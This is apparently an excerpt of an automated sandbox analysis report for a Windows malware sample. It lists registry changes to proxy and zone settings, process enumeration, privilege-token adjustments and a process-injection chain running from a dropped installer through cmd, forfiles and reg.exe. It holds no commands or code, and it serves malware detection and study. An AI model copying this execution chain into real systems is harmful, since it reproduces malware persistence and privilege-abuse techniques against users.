Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDecision = "0" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\wscript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\32-a7-9c-5d-1a-03 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0036000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadDecisionReason = "1" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5} C:\Windows\SysWOW64\rundll32.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDecisionTime = 80c17aece4bdda01 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDecisionTime = 8029b003e5bdda01 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\wscript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\RtJHCEf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDecision = "0" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadDecisionTime = 2062b804e5bdda01 C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0036000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDecisionTime = 80c17aece4bdda01 C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDetectedUrl C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\RtJHCEf.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadDecision = "0" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0036000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\SysWOW64\rundll32.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadDecisionTime = 8029b003e5bdda01 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDecisionReason = "1" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 956 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112.exe C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe
PID 956 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112.exe C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe
PID 956 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112.exe C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe
PID 956 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112.exe C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe
PID 956 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112.exe C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe
PID 956 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112.exe C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe
PID 956 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112.exe C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe
PID 1800 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe
PID 1800 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe
PID 1800 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe
PID 1800 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe
PID 1800 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe
PID 1800 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe
PID 1800 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe
PID 2060 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 2656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2736 wrote to memory of 2656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2736 wrote to memory of 2656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2736 wrote to memory of 2656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2736 wrote to memory of 2656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2736 wrote to memory of 2656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2736 wrote to memory of 2656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2656 wrote to memory of 2116 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2656 wrote to memory of 2116 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2656 wrote to memory of 2116 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2656 wrote to memory of 2116 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2656 wrote to memory of 2116 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2656 wrote to memory of 2116 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2656 wrote to memory of 2116 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2116 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2116 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2116 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2116 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2116 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2116 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2116 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2736 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2736 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2736 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2736 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2736 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2736 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2612 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2612 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2612 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2612 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2612 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2612 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2612 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2608 wrote to memory of 2632 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 2632 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 2632 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 2632 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 2632 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 2632 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 2632 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 2636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe

Processes

